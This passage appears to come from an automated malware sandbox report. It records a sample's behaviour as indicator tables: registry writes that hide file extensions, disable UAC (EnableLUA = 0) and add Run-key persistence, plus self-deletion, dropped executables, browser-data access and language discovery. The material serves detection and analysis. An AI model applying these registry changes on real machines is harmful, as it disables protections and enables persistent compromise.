| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Renames multiple (60) files with added filename extension
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\nUkEsQoc\TecsYMkQ.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\nUkEsQoc\TecsYMkQ.exe | N/A |
| N/A | N/A | C:\ProgramData\EMkwoYcY\KSkkUMoA.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\KSkkUMoA.exe = "C:\\ProgramData\\EMkwoYcY\\KSkkUMoA.exe" | C:\ProgramData\EMkwoYcY\KSkkUMoA.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\GykUgwEM.exe = "C:\\Users\\Admin\\MwYwMYgU\\GykUgwEM.exe" | C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ZEgMUogk.exe = "C:\\ProgramData\\zUosEUso\\ZEgMUogk.exe" | C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\TecsYMkQ.exe = "C:\\Users\\Admin\\nUkEsQoc\\TecsYMkQ.exe" | C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\KSkkUMoA.exe = "C:\\ProgramData\\EMkwoYcY\\KSkkUMoA.exe" | C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\TecsYMkQ.exe = "C:\\Users\\Admin\\nUkEsQoc\\TecsYMkQ.exe" | C:\Users\Admin\nUkEsQoc\TecsYMkQ.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | \??\c:\windows\installer\{ac76ba86-7ad7-1033-7b44-a90000000001}\pdffile_8.ico | C:\Users\Admin\nUkEsQoc\TecsYMkQ.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\MwYwMYgU\GykUgwEM.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\ProgramData\zUosEUso\ZEgMUogk.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
